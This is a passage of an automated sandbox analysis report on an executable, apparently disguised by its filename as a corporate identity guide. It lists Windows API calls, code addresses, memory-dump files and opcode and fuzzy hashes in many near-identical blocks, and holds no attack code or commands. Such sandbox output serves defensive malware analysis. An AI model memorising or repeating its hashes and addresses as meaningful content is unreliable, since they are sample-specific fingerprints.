                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                                                                                                • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                                                                                                                                • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                                                                                                • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                                  • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041DA00,771A23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                  • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,771A23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                  • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                  • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 334405425-0
                                                                                                                                                • Opcode ID: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
                                                                                                                                                • Instruction ID: 732860e23109d101385e559ec06a1cde6071cd761d8e517fa4c79c7f2b675a05
                                                                                                                                                • Opcode Fuzzy Hash: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
                                                                                                                                                • Instruction Fuzzy Hash: 4421B031D00205EACF20AFA5CE48A9E7A70BF04358F64413BF511B51E0DBBD8981DA6E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GlobalFree.KERNEL32(005C39D0), ref: 00401BE7
                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                                • String ID: Call
                                                                                                                                                • API String ID: 3394109436-1824292864
                                                                                                                                                • Opcode ID: f905998698a718dc4cf1a42dfb633cd665eb9fc086c23fd15b54cbfec95e9be3
                                                                                                                                                • Instruction ID: fc266f0b09462df108d5b450fd3a6dc377bab1f5c412968f7868140de6343470
                                                                                                                                                • Opcode Fuzzy Hash: f905998698a718dc4cf1a42dfb633cd665eb9fc086c23fd15b54cbfec95e9be3
                                                                                                                                                • Instruction Fuzzy Hash: 4521A572610100EBCB10EB94DEC995E73A9EB49318B25013FF106F32D0DBB9A8519BAD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Enum$CloseValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 397863658-0
                                                                                                                                                • Opcode ID: a7693fd32bbd6dda220c639d5c72a78338338ff509cc745735d7ea4ec565f031
                                                                                                                                                • Instruction ID: be079dd98ee366e8112d1373a1392f52e75f7f4d5f65991111ca301d6a19f001
                                                                                                                                                • Opcode Fuzzy Hash: a7693fd32bbd6dda220c639d5c72a78338338ff509cc745735d7ea4ec565f031
                                                                                                                                                • Instruction Fuzzy Hash: 4E018471904204BFEB149F95DE88ABF7ABCEF80358F14403EF505B61D0DAB85E419B69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                                • Opcode ID: 28dfcfb9a6f44a18c58c8206a7dfe2bd09e3a5ae6e90a5253dfd418af8ae02c6
                                                                                                                                                • Instruction ID: 794a7caf9ed311c3342b46d24488b6d71e3894ac8d4f1441d9e09f9d9ce2e922
                                                                                                                                                • Opcode Fuzzy Hash: 28dfcfb9a6f44a18c58c8206a7dfe2bd09e3a5ae6e90a5253dfd418af8ae02c6
                                                                                                                                                • Instruction Fuzzy Hash: A411A731D14205EBDF14DFA4CA585AE77B4EF44348F21843FE445B72C0D6B89A41EB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                                • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                                                                                                • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                                • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseDeleteValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2831762973-0
                                                                                                                                                • Opcode ID: 49dd4a4acbc57048e4a2cad6fc2e9fcf4131624f7ebcfe3fd0f4b4026ebfb941
                                                                                                                                                • Instruction ID: 2791961e855c801182d2f4b3e101f078c994d4f4985963d794b0561754721dd9
                                                                                                                                                • Opcode Fuzzy Hash: 49dd4a4acbc57048e4a2cad6fc2e9fcf4131624f7ebcfe3fd0f4b4026ebfb941
                                                                                                                                                • Instruction Fuzzy Hash: E6F09632E045119BE704BBA49B8EABE72A89B44354F29403FFE42F71C1CAF85D41676D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                                • Opcode ID: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                                                                                                                                • Instruction ID: 8ee55578b336c0276868c1e88f1fd45be51d25fee0972e3c110634e7b38d832d
                                                                                                                                                • Opcode Fuzzy Hash: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                                                                                                                                • Instruction Fuzzy Hash: 8BE01A72E082008FE724ABA5AA495AD77B8EB90325B20847FE211F11D1DA7858419F69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                  • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                  • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                                                                                                                  • Part of subcall function 00406624: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040668A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                                • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                                                                                                                                • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                                • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                • Instruction ID: fe430eedc911e7c92ce83e5abbc00e08444bb0e311ec0623c818608bfa408f6d
                                                                                                                                                • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                • Instruction Fuzzy Hash: 1BD0C972504420ABD2512728AF0C89BBB95DB542717028B39FAA9A22B0CB304C568A98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,771A3420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
                                                                                                                                                • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                                • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                • Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
                                                                                                                                                • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                • Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D
